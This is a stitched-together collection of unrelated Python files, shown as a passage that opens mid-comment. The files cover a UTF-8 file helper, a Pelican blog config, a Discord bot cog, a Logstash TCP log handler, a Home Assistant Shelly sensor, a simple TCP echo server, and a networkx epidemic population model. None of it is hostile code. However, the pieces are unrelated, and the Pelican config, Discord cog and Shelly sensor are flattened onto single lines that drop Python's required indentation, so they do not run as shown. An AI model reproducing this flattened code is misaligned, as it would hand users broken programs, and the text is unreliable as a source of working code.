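# on the platform default. The filename is the same placeholder used above.
def rw_text_utf8():
    # Write text with an explicit encoding
    with open('somefile.txt', 'wt', encoding='utf-8') as f:
        f.write('text1\n')
        f.write('text2\n')
    # Read it back with the same encoding
    with open('somefile.txt', 'rt', encoding='utf-8') as f:
        for line in f:
            print(line, end='')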
python
#!/usr/bin/env python # -*- coding: utf-8 -*- # from __future__ import unicode_literals AUTHOR = u'Eevee' SITENAME = u'fuzzy notepad' SITEURL = '' #SITESUBTITLE = ... TIMEZONE = 'America/Los_Angeles' DEFAULT_LANG = u'en' # Feed generation is usually not desired when developing FEED_ATOM = None FEED_ALL_ATOM = None CATEGORY_FEED_ATOM = None TRANSLATION_FEED_ATOM = None # Blogroll # TODO lol these don't exist in my theme and i'm not sure whether i care?? LINKS = (('Pelican', 'http://getpelican.com/'), ('Python.org', 'http://python.org/'), ('Jinja2', 'http://jinja.pocoo.org/'), ('You can modify those links in your config file', '#'),) # Social cruft # TODO theme doesn't support this, but i'd kinda like it for the main page SOCIAL = (('You can add links in your config file', '#'), ('Another social link', '#'),) TWITTER_USERNAME = 'eevee' GITHUB_URL = 'https://github.com/eevee' DEFAULT_PAGINATION = 17 DEFAULT_ORPHANS = 4 PAGINATION_PATTERNS = ( (1, '{base_name}/', '{base_name}/index.html'), (2, '{base_name}/page/{number}/', '{base_name}/page/{number}/index.html'), ) THEME = 'theme' EXTRA_HEADER = """ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.0/jquery.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/jquery.colorbox/1.4.33/jquery.colorbox-min.js"></script> <script type="text/javascript"> $(function() { $('article').each(function(index, article) { console.log(index, article); $(article).find('a.photo').colorbox({ fixed: true, maxWidth: '100%', maxHeight: '100%', rel: 'colorbox' + String(index + 1) }); }); }); </script> """ # Smart quotes and other things TYPOGRIFY = True MD_EXTENSIONS = [ 'codehilite(css_class=highlight,linenums=True)', 'extra', # GitHub-style fenced code blocks 'fenced_code', # I don't actually care about a table of contents, but this turns headers # into self-links 'toc(anchorlink=True)', ] PATH = 'content/' PAGE_DIR = '../pages/' STATIC_PATHS = ['favicon.png', 'media'] # URL schema; compatible with Octopress, but i happen to like it anyway ARCHIVES_URL = 'blog/archives/' # doesn't officially exist but whatever ARCHIVES_SAVE_AS = 'blog/archives/index.html' ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/' ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html' AUTHOR_SAVE_AS = False AUTHORS_SAVE_AS = False CATEGORIES_URL = 'blog/categories/' CATEGORIES_SAVE_AS = 'blog/categories/index.html' CATEGORY_URL = 'blog/categories/{slug}/' CATEGORY_SAVE_AS = 'blog/categories/{slug}/index.html' PAGE_URL = '{slug}/' PAGE_SAVE_AS = '{slug}/index.html' TAG_URL = 'blog/tags/{slug}/' TAG_SAVE_AS = 'blog/tags/{slug}/index.html' TAGS_URL = 'blog/tags/' TAGS_SAVE_AS = 'blog/tags/index.html' # Octopress-compatible filename metadata parsing FILENAME_METADATA = '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)' # Uncomment following line if you want document-relative URLs when developing #RELATIVE_URLS = True ### Plugins # Some minor hackery to have multiple PLUGIN_PATHs, since I want both canonical # plugins and one of my own... import os.path import sys sys.path.insert(0, os.path.dirname(__file__)) import eeveeblog.liquid_photo PLUGIN_PATH = "pelican-plugins.git" PLUGINS = [ eeveeblog.liquid_photo, 'summary' ] # Plugin config for summary SUMMARY_BEGIN_MARKER = '<!-- just kidding i never use this -->' SUMMARY_END_MARKER = '<!-- more -->' # octopress compat # This is actually a stock setting; I don't want an automatic summary if I # don't use an explicit marker SUMMARY_MAX_LENGTH = None
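
# Hedged illustration (kept commented so Pelican never executes it): how the
# FILENAME_METADATA pattern above splits an Octopress-style filename into
# date and slug. The example filename is made up.
#
#   import re
#   m = re.match(FILENAME_METADATA, '2014-03-07-my-post')
#   m.group('date'), m.group('slug')   # -> ('2014-03-07', 'my-post')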
python
""" Commands for fun """ from discord.ext import commands class FunCommands(commands.Cog, name='Fun'): def __init__(self, bot): print('Loading FunCommands module...', end='') self.bot = bot print(' Done') @commands.command(help='You spin me right round, baby, right round') async def spin(self, ctx): await ctx.send('https://www.youtube.com/watch?v=PGNiXGX2nLU') @commands.command(aliases=['XcQ'], help='A very interesting video you should consider watching') async def rickroll(self, ctx): await ctx.send('<https://www.youtube.com/watch?v=dQw4w9WgXcQ>') await ctx.send('<:kappa_jtcf:546748910765604875>') @commands.command() async def ping(self, ctx): pong = await ctx.send('pong!') time_diff = pong.created_at - ctx.message.created_at await pong.edit(content='pong!\nTime delta is {0} ms'.format(time_diff.microseconds/1000)) @commands.command(hidden=True, aliases=['UDOD_COMMUNIST', 'UDOD', 'udod', 'УДОД_КОММУНИСТ', 'Удод_Коммунист', 'УДОД', 'Удод', 'удод']) async def udod_communist(self, ctx): await ctx.send('https://www.youtube.com/watch?v=YHR5_IvC8Gw') @commands.command(hidden=True, aliases=['UDOD_COMMUNIST_2', 'UDOD2', 'udod2', 'УДОД_КОММУНИСТ_2', 'Удод_Коммунист_2', 'УДОД2', 'Удод2', 'удод2']) async def udod_communist2(self, ctx): await ctx.send('https://youtu.be/BgF5HcnNN-Q') def setup(bot): bot.add_cog(FunCommands(bot))
python
from logging.handlers import DatagramHandler, SocketHandler

from logstash import formatter


# Derive from object to force a new-style class and thus allow super() to work
# on Python 2.6
class TCPLogstashHandler(SocketHandler, object):
    """Python logging handler for Logstash. Sends events over TCP.
    :param host: The host of the logstash server.
    :param port: The port of the logstash server (default 5959).
    :param message_type: The type of the message (default logstash).
    :param fqdn: Indicates whether to show fully qualified domain name or not
        (default False).
    :param tags: list of tags for a logger (default is None).
    :param limit_stacktrace: limit characters for stacktraces
    :param limit_string_fields: limit characters for string fields
    :param limit_containers: limit length of containers (dict, list, set)
    """

    def __init__(self, host, port=5959, message_type='logstash', tags=None, fqdn=False, limit_stacktrace=0,
                 limit_string_fields=0, limit_containers=0):
        super(TCPLogstashHandler, self).__init__(host, port)
        self.formatter = formatter.LogstashFormatter(message_type, tags, fqdn, limit_stacktrace=limit_stacktrace,
                                                     limit_string_fields=limit_string_fields,
                                                     limit_containers=limit_containers)

    def makePickle(self, record):
        # frame each JSON event with a trailing newline for the TCP input
        return self.formatter.format(record) + b'\n'
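
# Hedged usage sketch: attaching the handler to a stdlib logger. It assumes a
# Logstash TCP input listening on localhost:5959; host, port and the extra
# field are illustrative only.
if __name__ == '__main__':
    import logging

    test_logger = logging.getLogger('python-logstash-logger')
    test_logger.setLevel(logging.INFO)
    test_logger.addHandler(TCPLogstashHandler('localhost', 5959))
    test_logger.info('test logstash message', extra={'custom_field': 42})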
python
""" Get Shelly Cloud information for a given host through web api. For more details about this platform, please refer to the documentation at https://github.com/marcogazzola/custom_components/blob/master/README.md """ import logging from homeassistant.helpers.entity import (Entity) from .const import ( REQUIREMENTS_LIST, CONF_DEVICES, DOMAIN as SHELLY_DOMAIN, CONST_SENSOR_ROLLER, CONST_SENSOR_RELAY, SENSOR_ICONS, CONST_SENSOR_SYSTEM, CONST_SENSOR_MQTT, CONST_SENSOR_CLOUD, CONST_SENSOR_WIFI, CONST_UPTODATE, CONST_UPDATEAVAILABLE, CONST_SENSOR_FIRMWARE, CONST_DISCONNECTED, CONST_CONNECTED) REQUIREMENTS = [REQUIREMENTS_LIST] _LOGGER = logging.getLogger(__name__) def setup_platform( hass, config, add_entities, discovery_info=None): """Add the Shelly Cloud Sensor entities""" from shellypython.const import (WORKING_MODE_RELAY, WORKING_MODE_ROLLER) for ip_address, shelly_data in ( hass.data[SHELLY_DOMAIN][CONF_DEVICES].items()): if ip_address not in hass.data[SHELLY_DOMAIN]['sensor']: if shelly_data is not None and shelly_data.data is not None: if shelly_data.data.working_mode_raw == WORKING_MODE_RELAY: if CONST_SENSOR_ROLLER in shelly_data.monitored_conditions: shelly_data.monitored_conditions.remove( CONST_SENSOR_ROLLER) elif shelly_data.data.working_mode_raw == WORKING_MODE_ROLLER: if CONST_SENSOR_RELAY in shelly_data.monitored_conditions: shelly_data.monitored_conditions.remove( CONST_SENSOR_RELAY) sensors = [] for variable in shelly_data.monitored_conditions: sensors.append( ShellySensor(shelly_data, variable, shelly_data.name)) hass.data[SHELLY_DOMAIN]['sensor'].append(ip_address) add_entities(sensors, True) class ShellySensor(Entity): """Implementation of Shelly sensor.""" def __init__(self, shelly_data, sensor_type, name): """Initialize the sensor.""" self.client_name = name self._name = sensor_type self.shelly_data = shelly_data self.type = sensor_type self._state = None self._unit_of_measurement = None self._attributes = None @property def name(self): """Return the name of the sensor.""" return '{} {}'.format(self.client_name, self._name) @property def unit_of_measurement(self): """Return the unit of measurement of this entity, if any.""" return self._unit_of_measurement @property def icon(self): """Return the icon to represent this sensor.""" if self.type in SENSOR_ICONS: return SENSOR_ICONS[self.type] return SENSOR_ICONS[CONST_SENSOR_SYSTEM] @property def state(self): """Return the expiration days for hostname.""" return self._state @property def device_state_attributes(self): """Get the more info attributes.""" return self._attributes def _empty_state_and_attributes(self): """Empty the state and attributes on an error.""" from shellypython.const import (DEVICE_NOT_READY) self._state = DEVICE_NOT_READY self._attributes = None def update(self): """Get the current Shelly status.""" # self.shelly_data.update() if self.shelly_data is None or self.shelly_data.data is None: self._empty_state_and_attributes() return if self.type == CONST_SENSOR_SYSTEM: self._state = self.shelly_data.data.main_status attributes_data = ( self.shelly_data.data.system.as_dict() if self.shelly_data.data.system is not None else None ) attributes_data.update({'model': self.shelly_data.data.model}) attributes_data.update( {'working_mode': self.shelly_data.data.working_mode} ) attributes_data.update( {'host_name': self.shelly_data.data.host_name} ) self._attributes = attributes_data elif self.type == CONST_SENSOR_MQTT: attributes_data = ( self.shelly_data.data.mqtt if self.shelly_data.data.mqtt is not None else None) 
            if attributes_data is None or not attributes_data.connected:
                self._state = CONST_DISCONNECTED
            else:
                self._state = CONST_CONNECTED
            self._attributes = None
        elif self.type == CONST_SENSOR_CLOUD:
            attributes_data = (
                self.shelly_data.data.cloud
                if self.shelly_data.data.cloud is not None
                else None)
            if attributes_data is None or not attributes_data.connected:
                self._state = CONST_DISCONNECTED
            else:
                self._state = CONST_CONNECTED
            self._attributes = None
        elif self.type == CONST_SENSOR_WIFI:
            attributes_data = (
                self.shelly_data.data.wifi_sta
                if self.shelly_data.data.wifi_sta is not None
                else None)
            if attributes_data is None or not attributes_data.connected:
                self._state = CONST_DISCONNECTED
                self._attributes = None
            else:
                self._state = "{} %".format(attributes_data.quality)
                self._attributes = {
                    "Ssid": attributes_data.ssid,
                    "Ip": attributes_data.ip,
                    "Rssi": attributes_data.rssi,
                }
        elif self.type == CONST_SENSOR_FIRMWARE:
            attributes_data = (
                self.shelly_data.data.firmware
                if self.shelly_data.data.firmware is not None
                else None)
            if attributes_data is None:
                # no firmware info available at all; avoid dereferencing None
                self._state = CONST_UPTODATE
                self._attributes = None
            elif not attributes_data.has_update:
                self._state = CONST_UPTODATE
                self._attributes = (
                    {"Current version": attributes_data.old_version}
                )
            else:
                self._state = CONST_UPDATEAVAILABLE
                self._attributes = {
                    "Current version": attributes_data.old_version,
                    "Latest version": attributes_data.new_version,
                }
python
from socket import *

HOST = ''
PORT = 10001
BUFSIZE = 1024
ADDR = (HOST, PORT)

# create the socket
serverSocket = socket(AF_INET, SOCK_STREAM)
# bind the socket to the address
serverSocket.bind(ADDR)
# listen for an incoming connection
serverSocket.listen(1)
# accept the connection
clientSocket, addr_info = serverSocket.accept()
print(clientSocket)

while True:
    data = clientSocket.recv(65535)
    if not data:
        break                               # end the session when no data is received
    print(data.decode())                    # print the received data
    line = input()
    clientSocket.sendall(line.encode())     # send the typed line back

clientSocket.close()
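
# Hedged companion sketch (kept commented; run it in a second terminal): a
# minimal client for the server above, assuming it runs on this machine on
# port 10001.
#
#   from socket import *
#   clientSocket = socket(AF_INET, SOCK_STREAM)
#   clientSocket.connect(('127.0.0.1', 10001))
#   clientSocket.sendall(input('> ').encode())
#   print(clientSocket.recv(1024).decode())
#   clientSocket.close()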
python
# -*- coding: utf-8 -*- """ Name: population.py Authors: Christian Haack, Stephan Meighen-Berger, Andrea Turcati Constructs the population. """ from typing import Union, Tuple import random import numpy as np # type: ignore import logging import networkx as nx # type: ignore import scipy.stats from networkx.utils import py_random_state from networkx.generators.community import _zipf_rv_below from ..config import config from ..pdfs import construct_pdf from .population_base import Population _log = logging.getLogger(__name__) def intra_com_cons(g, u): c = g.nodes[u]["community"] adj_in_com = 0 for adj in g[u]: if adj in c: adj_in_com += 1 return adj_in_com def suboptimal(g, u, target_intra): adj_in_com = intra_com_cons(g, u) return (adj_in_com < target_intra) and target_intra > 0 def supoptimal(g, u, target_intra): adj_in_com = intra_com_cons(g, u) return adj_in_com > target_intra @py_random_state(6) def _powerlaw_sequence(gamma, low, high, condition, length, max_iters, seed): """Returns a list of numbers obeying a constrained power law distribution. ``gamma`` and ``low`` are the parameters for the Zipf distribution. ``high`` is the maximum allowed value for values draw from the Zipf distribution. For more information, see :func:`_zipf_rv_below`. ``condition`` and ``length`` are Boolean-valued functions on lists. While generating the list, random values are drawn and appended to the list until ``length`` is satisfied by the created list. Once ``condition`` is satisfied, the sequence generated in this way is returned. ``max_iters`` indicates the number of times to generate a list satisfying ``length``. If the number of iterations exceeds this value, :exc:`~networkx.exception.ExceededMaxIterations` is raised. seed : integer, random_state, or None (default) Indicator of random number generation state. See :ref:`Randomness<randomness>`. """ for i in range(max_iters): seq = [] while not length(seq): seq.append(_zipf_rv_below(gamma, low, high, seed)) if condition(seq): return seq raise nx.ExceededMaxIterations("Could not create power law sequence") @py_random_state(4) def _generate_communities(degree_seq, community_sizes, mu, max_iters, seed): """Returns a list of sets, each of which represents a community. ``degree_seq`` is the degree sequence that must be met by the graph. ``community_sizes`` is the community size distribution that must be met by the generated list of sets. ``mu`` is a float in the interval [0, 1] indicating the fraction of intra-community edges incident to each node. ``max_iters`` is the number of times to try to add a node to a community. This must be greater than the length of ``degree_seq``, otherwise this function will always fail. If the number of iterations exceeds this value, :exc:`~networkx.exception.ExceededMaxIterations` is raised. seed : integer, random_state, or None (default) Indicator of random number generation state. See :ref:`Randomness<randomness>`. The communities returned by this are sets of integers in the set {0, ..., *n* - 1}, where *n* is the length of ``degree_seq``. """ # This assumes the nodes in the graph will be natural numbers. result = [set() for _ in community_sizes] n = len(degree_seq) free = list(range(n)) com_indices = range(len(community_sizes)) for i in range(max_iters): v = free.pop() c = seed.choice(com_indices) # s = int(degree_seq[v] * (1 - mu) + 0.5) s = round(degree_seq[v] * (1 - mu)) # If the community is large enough, add the node to the chosen # community. Otherwise, return it to the list of unaffiliated # nodes. 
if s < community_sizes[c]: result[c].add(v) else: free.append(v) # If the community is too big, remove a node from it. if len(result[c]) > community_sizes[c]: rnd_node = seed.choice(tuple(result[c])) free.append(rnd_node) result[c].remove(rnd_node) if not free: return result msg = "Could not assign communities; try increasing min_community" raise nx.ExceededMaxIterations(msg) class NetworkXWrappers(object): @staticmethod def add_lfr_weights(g): g.remove_edges_from(nx.selfloop_edges(g)) edge_weights = {} inter_actions_rvs = construct_pdf( config["population"]["nx"]["inter freq pdf"] ).rvs intra_actions_rvs = construct_pdf( config["population"]["nx"]["intra freq pdf"] ).rvs inter_actions = inter_actions_rvs(len(g)) intra_actions = intra_actions_rvs(len(g)) for edge in g.edges: if edge[0] in g.nodes[edge[1]]["community"]: intra_rate_0 = intra_actions[edge[0]] / g.degree[edge[0]] intra_rate_1 = intra_actions[edge[1]] / g.degree[edge[1]] avg_int = 0.5 * (intra_rate_0 + intra_rate_1) # mu is the fraction of inter-community interacions edge_weights[edge] = avg_int else: inter_rate_0 = inter_actions[edge[0]] / g.degree[edge[0]] inter_rate_1 = inter_actions[edge[1]] / g.degree[edge[1]] avg_int = 0.5 * (inter_rate_0 + inter_rate_1) edge_weights[edge] = avg_int nx.set_edge_attributes(g, edge_weights, "weight") return g @staticmethod def lfr_benchmark(pop_size, **kwargs): kwargs["seed"] = config["runtime"]["random state"] g = nx.generators.community.LFR_benchmark_graph(pop_size, **kwargs) g = NetworkXWrappers.add_lfr_weights(g) return g @staticmethod def lfr_ba(pop_size, **kwargs): seed = config["general"]["random state seed"] random.seed(seed) state = config["runtime"]["random state"] kwargs["seed"] = seed mu = kwargs["mu"] g = nx.barabasi_albert_graph(pop_size, kwargs["m"], seed=seed) deg_seq = list(dict(nx.degree(g)).values()) min_community = kwargs.get("min_community", None) max_community = kwargs.get("max_community", None) n = pop_size # Validate parameters for generating the community size sequence. if min_community is None: min_community = min(deg_seq) + 1 else: if min_community < min(deg_seq) + 1: print("Min community is smaller than min(k)+1. Adjusting") min_community = min(deg_seq) + 1 if max_community is None: max_community = 3*max(deg_seq) else: if max_community < max(deg_seq) + 1: print("Max community is smaller than max(k)+1. Adjusting") max_community = int(2 * (max(deg_seq))) low, high = min_community, max_community def condition(seq): return sum(seq) == n def length(seq): return sum(seq) >= n comms = _powerlaw_sequence( kwargs["tau"], low, high, condition, length, kwargs["max_iters"], seed, ) communities = _generate_communities(deg_seq, comms, mu, 50 * n, seed) g.remove_edges_from(nx.selfloop_edges(g)) for c in communities: for u in c: g.nodes[u]["community"] = c node_degrees = np.asarray(list(dict(g.degree).values())) num_inter_con = state.binomial(node_degrees, mu) num_intra_con = node_degrees - num_inter_con # print("Target mu: ", np.sum(num_inter_con) / np.sum(node_degrees)) max_it = 75 it = -1 last_mu = 0 no_change_for = 0 while True: it += 1 """ if it % 5 == 4: num_inter_con = state.binomial(node_degrees, mu) num_intra_con = node_degrees - num_inter_con """ intra_cnt = np.sum( [v in g.nodes[u]["community"] for u, v in g.edges] ) cur_mu = 1 - intra_cnt / g.number_of_edges() if ( np.abs(cur_mu / mu - 1) < kwargs["tolerance"] * mu or cur_mu < mu ): break if cur_mu == last_mu: no_change_for += 1 if no_change_for == 5: print( "No change for five steps. 
Current mu: ", cur_mu, " Target: ", mu, ) break else: no_change_for = 0 last_mu = cur_mu if it > max_it: print( "Max iterations reached. Current mu: ", cur_mu, " Target: ", mu, ) break # First find all sub- and sup-optimal nodes all_sub_optimal_nodes = set() all_sup_optimal_nodes = set() for u, n_inter_con, n_intra_con in zip( g, num_inter_con, num_intra_con ): c = g.nodes[u]["community"] if supoptimal(g, u, n_intra_con): all_sup_optimal_nodes.add(u) elif suboptimal(g, u, n_intra_con): all_sub_optimal_nodes.add(u) assert len(all_sup_optimal_nodes & all_sub_optimal_nodes) == 0 for u, n_inter_con, n_intra_con in zip( g, num_inter_con, num_intra_con ): if node_degrees[u] < 2: continue c = g.nodes[u]["community"] if ( u not in all_sub_optimal_nodes and u not in all_sup_optimal_nodes ): continue sub_optimal_nodes = all_sub_optimal_nodes & c sup_optimal_nodes = all_sup_optimal_nodes & c not_optimal_nodes = sub_optimal_nodes | sup_optimal_nodes attempted_vs = set() if u in sub_optimal_nodes: sub_optimal_nodes.remove(u) not_optimal_nodes.remove(u) all_sub_optimal_nodes.remove(u) while True: if len(not_optimal_nodes) < 1: break if not suboptimal(g, u, n_intra_con): break candidates = tuple(not_optimal_nodes - attempted_vs) if not candidates: break if kwargs["pref_attach"]: v = random.choices( candidates, weights=node_degrees[list(candidates)], )[0] else: v = random.choice(candidates) attempted_vs.add(v) if v in sup_optimal_nodes: # Strategy: # -Rewire an internal connection from v to u # -Rewire an external connection from u to v # Get external adjacent node of u target_1 = None shuffled_adj = list(g[u]) random.shuffle(shuffled_adj) for adj in shuffled_adj: if ( adj not in c and adj not in g[v] and adj != v ): target_1 = adj break if target_1 is None: continue # Get internal adjacent node of v target_2 = None for adj in g[v]: if adj in c and adj not in g[u] and adj != u: target_2 = adj break if target_2 is None: continue g.remove_edge(u, target_1) g.remove_edge(v, target_2) g.add_edge(u, target_2) g.add_edge(v, target_1) if not supoptimal(g, v, num_intra_con[v]): sup_optimal_nodes.remove(v) all_sup_optimal_nodes.remove(v) not_optimal_nodes.remove(v) else: # Strategy: # -Rewire an external connection from v to u # -Rewire an external connection from u to v # -Connect the two external nodes # Pick a sub-optimal node from community # v = random.choices( # tuple(sub_optimal_nodes), # weights=[g.degree[node] # for node in sub_optimal_nodes])[0] if v in g[u]: continue # From edges of u shuffled_adj = list(g[u]) random.shuffle(shuffled_adj) target_1 = None for adj in shuffled_adj: if adj not in c: target_1 = adj break if target_1 is None: break target_2 = None for adj in g[v]: if ( adj not in c # and adj in all_sup_optimal_nodes and adj != target_1 and target_2 not in g.nodes[target_1]["community"] and target_2 not in g[target_1] ): target_2 = adj break if target_2 is None: break g.add_edge(u, v) g.remove_edge(u, target_1) g.remove_edge(v, target_2) g.add_edge(target_1, target_2) if not suboptimal(g, v, num_intra_con[v]): sub_optimal_nodes.remove(v) all_sub_optimal_nodes.remove(v) not_optimal_nodes.remove(v) if suboptimal(g, u, num_intra_con[u]): sub_optimal_nodes.add(u) all_sub_optimal_nodes.add(u) not_optimal_nodes.add(u) # TODO: check targets? 
                else:
                    sup_optimal_nodes.remove(u)
                    all_sup_optimal_nodes.remove(u)
                    not_optimal_nodes.remove(u)

                    while True:
                        if len(sub_optimal_nodes) < 1:
                            break
                        if not supoptimal(g, u, n_intra_con):
                            break
                        candidates = tuple(sub_optimal_nodes - attempted_vs)
                        if not candidates:
                            break
                        if kwargs["pref_attach"]:
                            v = random.choices(
                                candidates,
                                weights=node_degrees[list(candidates)],
                            )[0]
                        else:
                            v = random.choice(candidates)
                        attempted_vs.add(v)
                        """
                        v = random.choices(
                            tuple(sub_optimal_nodes),
                            weights=[g.degree[node]
                                     for node in sub_optimal_nodes])[0]
                        """
                        # Pick adjacent internal node
                        # u - target1
                        target_1 = None
                        shuffled_adj = list(g[u])
                        random.shuffle(shuffled_adj)
                        for adj in shuffled_adj:
                            if adj in c and adj not in g[v] and adj != v:
                                target_1 = adj
                                break
                        if target_1 is None:
                            # No luck this turn
                            break
                        target_2 = None
                        # Choose an inter-community edge from v
                        # v - target_2
                        for adj in g[v]:
                            if adj not in c and adj not in g[u]:
                                target_2 = adj
                                break
                        if target_2 is None:
                            break
                        g.remove_edge(u, target_1)  # u-1i, target1-1i
                        g.remove_edge(v, target_2)  # v-1e, target2-1e
                        g.add_edge(u, target_2)     # u+1e, target2+1e
                        g.add_edge(v, target_1)     # v+1i, target1+1i

                        if not suboptimal(g, v, num_intra_con[v]):
                            sub_optimal_nodes.remove(v)
                            all_sub_optimal_nodes.remove(v)
                            not_optimal_nodes.remove(v)
                        if not supoptimal(g, u, num_intra_con[u]):
                            sup_optimal_nodes.add(u)
                            all_sup_optimal_nodes.add(u)
                            not_optimal_nodes.add(u)

        g = NetworkXWrappers.add_lfr_weights(g)
        nx.set_node_attributes(
            g, kwargs["symp_prob"], "symp_prob")
        return g

    @staticmethod
    def hierarchical_lfr_ba(pop_size, **kwargs):
        seed = config["general"]["random state seed"]
        n = pop_size
        random.seed(seed)

        def condition(seq):
            return sum(seq) == n

        def length(seq):
            return sum(seq) >= n

        graph_sizes = _powerlaw_sequence(
            kwargs["tau_graphs"],
            kwargs["min_graph"],
            kwargs["max_graph"],
            condition,
            length,
            kwargs["max_iters"],
            seed,
        )

        cur_size = 0
        combined = nx.Graph()
        for hier_com, gs in enumerate(graph_sizes):
            g = NetworkXWrappers.lfr_ba(gs, **kwargs)
            mapping = {i: i+cur_size for i in range(gs)}
            nx.relabel_nodes(g, mapping, copy=False)
            for node in g:
                g.nodes[node]["hier_comm"] = hier_com
                comm = g.nodes[node]["community"]
                relabeled_comm = set()
                for val in list(comm):
                    relabeled_comm.add(val+cur_size)
                # store the shifted set; without this assignment the
                # "community" attribute kept the pre-relabelling node ids
                g.nodes[node]["community"] = relabeled_comm
            combined.add_nodes_from(g.nodes(data=True))
            combined.add_edges_from(g.edges)
            cur_size += gs

        for u in combined:
            this_hcomm = combined.nodes[u]["hier_comm"]
            adjs = combined[u]
            for adj in list(adjs):
                if (adj not in combined.nodes[u]["community"]
                        and random.uniform(0, 1) < kwargs["mu_hier"]/2):
                    while True:
                        randint = random.randint(0, pop_size-1)
                        v = combined.nodes[randint]
                        if randint == u:
                            continue
                        if randint in combined.nodes[u]["community"]:
                            continue
                        if v["hier_comm"] == this_hcomm:
                            continue
                        partner = None
                        for adj2 in list(combined[randint]):
                            if (adj2 not in v["community"]
                                    and adj2 not in
                                    combined.nodes[u]["community"]):
                                partner = adj2
                                break
                        if partner is not None:
                            break
                    combined.remove_edge(u, adj)
                    combined.remove_edge(randint, partner)
                    combined.add_edge(u, randint)
                    combined.add_edge(adj, partner)
        combined = NetworkXWrappers.add_lfr_weights(combined)
        # set the attribute on the combined graph (the original code passed
        # the last subgraph `g` here by mistake)
        nx.set_node_attributes(
            combined, kwargs["school_symp_prob"], "symp_prob")
        return combined

    @staticmethod
    def relaxed_caveman_graph(pop_size, **kwargs):
        clique_size = kwargs["clique_size"]
        n_cliques = pop_size // clique_size
        p = kwargs["p"]
        g = nx.relaxed_caveman_graph(n_cliques, clique_size, p)
        g.remove_edges_from(nx.selfloop_edges(g))

        if kwargs["pruning_frac"] > 0:
            # random.sample requires a sequence, so materialize the EdgeView
            rem_edges = random.sample(
                list(g.edges), k=int(kwargs["pruning_frac"] * len(g.edges))
            )
            g.remove_edges_from(rem_edges)

        return g

    @staticmethod
    def schools_model(pop_size, **kwargs):
        rstate = config["runtime"]["random state"]
        school_graph = NetworkXWrappers.relaxed_caveman_graph(
            pop_size, **kwargs
        )
        nx.set_node_attributes(
            school_graph, kwargs["school_symp_prob"], "symp_prob")

        # add families
        family_sizes = scipy.stats.nbinom.rvs(
            8, 0.9, size=len(school_graph), random_state=rstate) + 1

        cur_size = len(school_graph)
        combined = nx.Graph()
        combined.add_nodes_from(school_graph.nodes(data=True))
        combined.add_edges_from(school_graph.edges)

        for node, fam_size in zip(school_graph.nodes, family_sizes):
            combined.nodes[node]["type"] = "school"
            combined.nodes[node]["random_testable"] = True
            combined.nodes[node]["family_index"] = node
            f_graph = nx.generators.complete_graph(fam_size)
            nx.set_node_attributes(
                f_graph, kwargs["family_symp_prob"], "symp_prob")
            mapping = {i: i+cur_size for i in range(fam_size)}
            nx.relabel_nodes(f_graph, mapping, copy=False)
            for v in f_graph.nodes:
                f_graph.nodes[v]["type"] = "family"
                f_graph.nodes[v]["family_index"] = node
                f_graph.nodes[v]["random_testable"] = False
            combined.add_nodes_from(f_graph.nodes(data=True))
            for v in f_graph.nodes:
                combined.add_edge(node, v)
            combined.add_edges_from(f_graph.edges)
            cur_size += fam_size
        combined.graph["n_school"] = len(school_graph)
        return combined


class NetworkXPopulation(Population):
    def __init__(self, interaction_rate_scaling=1, *args, **kwargs):
        super().__init__(
            interaction_rate_scaling=interaction_rate_scaling, *args, **kwargs
        )
        self._random_interact_pdf = construct_pdf(
            config["population"]["random interactions pdf"]
        )
        self._random_interact_intensity_pdf = construct_pdf(
            config["population"]["random interactions intensity pdf"]
        )

        gen_func = getattr(
            NetworkXWrappers, config["population"]["nx"]["func"]
        )
        self._graph = gen_func(
            self._pop_size, **(config["population"]["nx"]["kwargs"])
        )
        for node in self._graph:
            self._graph.nodes[node]["history"] = {}

    def get_contacts(
        self, rows: np.ndarray, cols: np.ndarray, return_rows=False
    ) -> Union[
        Tuple[np.ndarray, np.ndarray],
        Tuple[np.ndarray, np.ndarray, np.ndarray],
    ]:
        contact_cols = []
        contact_rows = []

        # `np.int` was removed in NumPy 1.24; the builtin `int` is equivalent
        n_rnd_contacts = np.asarray(
            np.round(self._random_interact_pdf.rvs(rows.shape[0])),
            dtype=int,
        )
        rnd_indices_all = np.split(
            self._rstate.randint(
                0, len(rows), size=np.sum(n_rnd_contacts), dtype=int
            ),
            np.cumsum(n_rnd_contacts),
        )[:-1]
        rnd_ctc_intens_all = np.split(
            self._random_interact_intensity_pdf.rvs(np.sum(n_rnd_contacts)),
            np.cumsum(n_rnd_contacts),
        )[:-1]

        col_set = set(cols)
        for row, n_rnd_contact, rnd_indices, rnd_ctc_intens in zip(
                rows, n_rnd_contacts, rnd_indices_all, rnd_ctc_intens_all):
            sel_cols = []
            sel_rows = []
            adj = self._graph[row]
            for ctc_ind, node_attrs in adj.items():
                if ctc_ind not in col_set:
                    continue
                sel_cols.append(ctc_ind)
                sel_rows.append(row)

            for rnd_ind, intens in zip(rnd_indices, rnd_ctc_intens):
                if rnd_ind not in col_set:
                    continue
                if rnd_ind not in adj:
                    sel_cols.append(rnd_ind)
                    sel_rows.append(row)

            contact_cols.append(np.array(sel_cols, dtype=int))
            contact_rows.append(np.array(sel_rows, dtype=int))

        if contact_cols:
            contact_cols = np.concatenate(contact_cols)
            contact_rows = np.concatenate(contact_rows)
            unique_indices, ind, counts = np.unique(
                contact_cols, return_index=True, return_counts=True
            )
            contact_cols = unique_indices
            # contact_rates = contact_rates[ind] * counts
            contact_rows = contact_rows[ind]
            contact_strengths = np.ones_like(unique_indices) * counts
        else:
            contact_cols = np.empty(0, dtype=int)
            contact_rows = np.empty(0, dtype=int)
contact_strengths = np.empty(0, dtype=int) if return_rows: return contact_cols, contact_strengths, contact_rows else: return contact_cols, contact_strengths
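
# Hedged smoke test (illustration only; this module uses relative imports,
# so it cannot run as a standalone script). The keyword values are arbitrary
# but match exactly the kwargs the wrapper reads:
#
#   demo = NetworkXWrappers.relaxed_caveman_graph(
#       200, clique_size=10, p=0.1, pruning_frac=0.05)
#   print(demo.number_of_nodes(), demo.number_of_edges())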
python
